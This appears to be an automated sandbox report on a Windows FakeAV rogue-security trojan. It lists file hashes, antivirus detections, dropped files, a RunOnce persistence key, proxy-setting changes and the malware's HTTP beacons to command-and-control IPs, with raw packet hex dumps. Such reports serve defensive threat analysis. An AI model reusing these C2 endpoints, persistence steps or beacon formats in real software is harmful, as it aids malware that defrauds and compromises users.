Analysis Date2015-08-02 19:23:49
MD59a6f9b60c69a3d4b1c148759b6b2297b
SHA1e917a3cae24315240605321e476b876994d78489

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 56389db5e43e660f19198c2a9f285ae1 sha1: 3ef9be8f0a8a0c05565fe9e254f86505a858533f size: 201728
Section.rdata md5: 1a56dbef144625aa741429f21e26a477 sha1: 9b8ebc3f1acb2d2f7e13180b0c3c53de5857be22 size: 2048
Section.data md5: 73bbbdb16448534ef0dbfbaecddb2b24 sha1: aa806f032310e7545900be757969798599ca1162 size: 136704
Section.rsrc md5: 6582709bb5e3792f5068614d590dc850 sha1: 984b15b6f54055831be3549b4ae9b1adba1a20ce size: 5120
Timestamp1970-01-11 11:10:29
PEhash541c4a50778bc10901e4d4af7fc71e05d392ebfc
IMPhash8aaaf4897d2db89e81da04378e9e697c
AVRisingTrojan.FakeAV!49B1
AVMcafeeGeneric FakeAlert.amb
AVAvira (antivir)TR/FakeAV.btxt.7
AVTwisterTrojan.4376C03D4FA52665
AVAd-AwareGen:Heur.Cridex.2
AVAlwil (avast)MalOb-FY [Cryp]
AVEset (nod32)Win32/Kryptik.LYW
AVGrisoft (avg)FakeAlert.AAL
AVSymantecTrojan.FakeAV!gen39
AVFortinetW32/FakeAlert.AMB!tr
AVBitDefenderGen:Heur.Cridex.2
AVK7Trojan ( 001e60c61 )
AVMicrosoft Security EssentialsRogue:Win32/Winwebsec
AVMicroWorld (escan)Gen:Heur.Cridex.2
AVMalwareBytesRogue.SystemTool
AVAuthentiumW32/FakeAlert.LY.gen!Eldorado
AVFrisk (f-prot)W32/FakeAlert.LY.gen!Eldorado
AVIkarusTrojan.Win32.Pakes
AVEmsisoftGen:Heur.Cridex.2
AVZillya!Trojan.FakeAV.Win32.54128
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTROJ_FAKEAV.SMID
AVCAT (quickheal)FraudTool.Security
AVVirusBlokAda (vba32)Malware-Cryptor.Limpopo
AVPadvishno_virus
AVBullGuardGen:Heur.Cridex.2
AVArcabit (arcavir)Gen:Heur.Cridex.2
AVClamAVWin.Trojan.Fakeav-6383
AVDr. WebTrojan.Fakealert.20511
AVF-SecureGen:Heur.Cridex.2
AVCA (E-Trust Ino)Win32/Diple.A!generic

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a360F.tmp
Creates FileC:\Documents and Settings\All Users\Application Data\hChElAnLfAn01805\hChElAnLfAn01805.exe
Creates FileC:\e917a3cae24315240605321e476b876994d78489
Deletes FileC:\e917a3cae24315240605321e476b876994d78489
Creates Process"C:\Documents and Settings\All Users\Application Data\hChElAnLfAn01805\hChElAnLfAn01805.exe" "C:\malware.exe"
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\aCF41.tmp"
Creates MutexDon't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\hChElAnLfAn01805\hChElAnLfAn01805.exe" "C:\malware.exe"

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hChElAnLfAn01805 ➝
C:\Documents and Settings\All Users\Application Data\hChElAnLfAn01805\hChElAnLfAn01805.exe\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\All Users\Application Data\hChElAnLfAn01805\hChElAnLfAn01805
Creates MutexDon't stop me! I give work and money for you!
Winsock DNS69.50.209.245
Winsock DNS69.50.195.76

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aCF41.tmp"

Network Details:

HTTP GEThttp://194.28.113.214/lurl.php?affid=01805
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POSThttp://69.50.195.76/install.php?affid=01805
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP GEThttp://69.50.209.245/buy.php?affid=01805&data=7F136B16D32EBE585C4D3B61159ED3A2303230323032303200656A199848C614010004&h=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://69.50.209.245/buy.php?affid=01805&data=7F136B16D32EBE585C4D3B61159ED3A2303230323032303200656A199848C614010004&h=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP192.168.1.1:1032 ➝ 69.50.195.76:80
Flows TCP192.168.1.1:1034 ➝ 69.50.209.245:80
Flows TCP192.168.1.1:1035 ➝ 69.50.209.245:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 30313830 35204854 54502f31   fid=01805 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f696e 7374616c 6c2e7068   POST /install.ph
0x00000010 (00016)   703f6166 6669643d 30313830 35204854   p?affid=01805 HT
0x00000020 (00032)   54502f31 2e310d0a 52656665 7265723a   TP/1.1..Referer:
0x00000030 (00048)   20687474 703a2f2f 36392e35 302e3139    http://69.50.19
0x00000040 (00064)   352e3736 0d0a4163 63657074 3a202a2f   5.76..Accept: */
0x00000050 (00080)   2f2a0d0a 436f6e74 656e742d 54797065   /*..Content-Type
0x00000060 (00096)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000070 (00112)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000080 (00128)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000090 (00144)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000a0 (00160)   6d706174 69626c65 3b204d53 49452037   mpatible; MSIE 7
0x000000b0 (00176)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x000000c0 (00192)   2e313b20 47544230 2e303b20 2e4e4554   .1; GTB0.0; .NET
0x000000d0 (00208)   20434c52 20312e31 2e343332 32290d0a    CLR 1.1.4322)..
0x000000e0 (00224)   486f7374 3a203639 2e35302e 3139352e   Host: 69.50.195.
0x000000f0 (00240)   37360d0a 436f6e74 656e742d 4c656e67   76..Content-Leng
0x00000100 (00256)   74683a20 37340d0a 436f6e6e 65637469   th: 74..Connecti
0x00000110 (00272)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000120 (00288)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000130 (00304)   6f2d6361 6368650d 0a0d0a64 6174613d   o-cache....data=
0x00000140 (00320)   37463133 36423136 44333245 42453538   7F136B16D32EBE58
0x00000150 (00336)   35433444 33423631 31353945 44334132   5C4D3B61159ED3A2
0x00000160 (00352)   33303332 33303332 33303332 33303332   3032303230323032
0x00000170 (00368)   30303635 36413139 39383438 43363134   00656A199848C614
0x00000180 (00384)   30313034 31                           01041

0x00000000 (00000)   47455420 2f627579 2e706870 3f616666   GET /buy.php?aff
0x00000010 (00016)   69643d30 31383035 26646174 613d3746   id=01805&data=7F
0x00000020 (00032)   31333642 31364433 32454245 35383543   136B16D32EBE585C
0x00000030 (00048)   34443342 36313135 39454433 41323330   4D3B61159ED3A230
0x00000040 (00064)   33323330 33323330 33323330 33323030   3230323032303200
0x00000050 (00080)   36353641 31393938 34384336 31343031   656A199848C61401
0x00000060 (00096)   30303034 26683d31 20485454 502f312e   0004&h=1 HTTP/1.
0x00000070 (00112)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000080 (00128)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000090 (00144)   20656e2d 75730d0a 41636365 70742d45    en-us..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2036 392e3530 2e323039   .Host: 69.50.209
0x00000120 (00288)   2e323435 0d0a436f 6e6e6563 74696f6e   .245..Connection
0x00000130 (00304)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x00000140 (00320)   37463133 36423136 44333245 42453538   7F136B16D32EBE58
0x00000150 (00336)   35433444 33423631 31353945 44334132   5C4D3B61159ED3A2
0x00000160 (00352)   33303332 33303332 33303332 33303332   3032303230323032
0x00000170 (00368)   30303635 36413139 39383438 43363134   00656A199848C614
0x00000180 (00384)   30313034 31                           01041

0x00000000 (00000)   47455420 2f627579 2e706870 3f616666   GET /buy.php?aff
0x00000010 (00016)   69643d30 31383035 26646174 613d3746   id=01805&data=7F
0x00000020 (00032)   31333642 31364433 32454245 35383543   136B16D32EBE585C
0x00000030 (00048)   34443342 36313135 39454433 41323330   4D3B61159ED3A230
0x00000040 (00064)   33323330 33323330 33323330 33323030   3230323032303200
0x00000050 (00080)   36353641 31393938 34384336 31343031   656A199848C61401
0x00000060 (00096)   30303034 26683d32 20485454 502f312e   0004&h=2 HTTP/1.
0x00000070 (00112)   310d0a41 63636570 743a2069 6d616765   1..Accept: image
0x00000080 (00128)   2f676966 2c20696d 6167652f 782d7862   /gif, image/x-xb
0x00000090 (00144)   69746d61 702c2069 6d616765 2f6a7065   itmap, image/jpe
0x000000a0 (00160)   672c2069 6d616765 2f706a70 65672c20   g, image/pjpeg, 
0x000000b0 (00176)   6170706c 69636174 696f6e2f 782d7368   application/x-sh
0x000000c0 (00192)   6f636b77 6176652d 666c6173 682c202a   ockwave-flash, *
0x000000d0 (00208)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x000000e0 (00224)   6167653a 20656e2d 75730d0a 41636365   age: en-us..Acce
0x000000f0 (00240)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000100 (00256)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000110 (00272)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000120 (00288)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000130 (00304)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000140 (00320)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000150 (00336)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x00000160 (00352)   3237290d 0a486f73 743a2036 392e3530   27)..Host: 69.50
0x00000170 (00368)   2e323039 2e323435 0d0a436f 6e6e6563   .209.245..Connec
0x00000180 (00384)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x00000190 (00400)   0d0a0d0a                              ....


Strings